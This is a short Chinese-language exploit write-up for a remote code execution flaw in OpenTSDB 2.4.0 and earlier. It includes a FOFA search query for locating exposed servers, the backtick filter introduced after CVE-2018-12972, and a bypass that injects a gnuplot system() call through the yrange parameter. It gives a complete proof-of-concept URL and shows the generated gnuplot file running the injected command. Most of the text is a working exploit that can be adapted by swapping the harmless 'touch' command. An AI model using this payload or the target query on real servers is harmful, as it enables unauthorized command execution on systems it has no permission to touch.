在OpenTSDB 2.4.0及更低版本中yrange参数发现了一个远程执行代码漏洞(其他参数可能也容易受到攻击)。
fofa:title="Opentsdb" ||body="opentsdb_header.jpg"
在 CVE-2018-12972 用 反引号 来进行命令注入,o=%60ls%60 官方引入如下函数来过滤,现在可以重新被绕过。
// TODO - far from perfect, should help a little.
if *(given.contains("`") || given.contains("%60") ||
given.contains("`")) *{
throw new BadRequestException("Parameter " + param + " contained a "
+ "back-tick. That's a no-no.");
}
/src/tsd/GraphHandler.java:
private static String popParam(final Map<String, List<String>> querystring,
final String param) {
final List<String> params = querystring.remove(param);
if (params == null) {
return null;
}
final String given = params.get(params.size() - 1);
// TODO - far from perfect, should help a little.
if *(given.contains("`") || given.contains("%60") ||
given.contains("`")) *{
throw new BadRequestException("Parameter " + param + " contained a "
+ "back-tick. That's a no-no.");
}
return given;
}
Bypass Payload:
[33:system('touch/tmp/poc.txt')]
PoC:
http://opentsdbhost.local/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system('touch/tmp/poc.txt')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
OpenTSDB在temp目录中创建的gnuplot文件如下所示:
set term png small size 1516,644
set xdata time
set timefmt "%s"
if (GPVAL_VERSION < 4.6) set xtics rotate; else set xtics rotate right
set output "/tmp/d705ba5b.png"
set xrange ["972086400":"1603641404"]
set format x "%Y/%m/%d"
set grid
set style data linespoint
set key right box
set ylabel ""
*set yrange [33:system('touch /tmp/poc.txt')]*
plot "/tmp/d705ba5b_0.dat" using 1:2 title "sys.cpu.nice{host=web01, dc=lga}"
当OpenTSDB执行mygnuplot.sh的时候poc.txt文件将被写入到临时目录。
ref: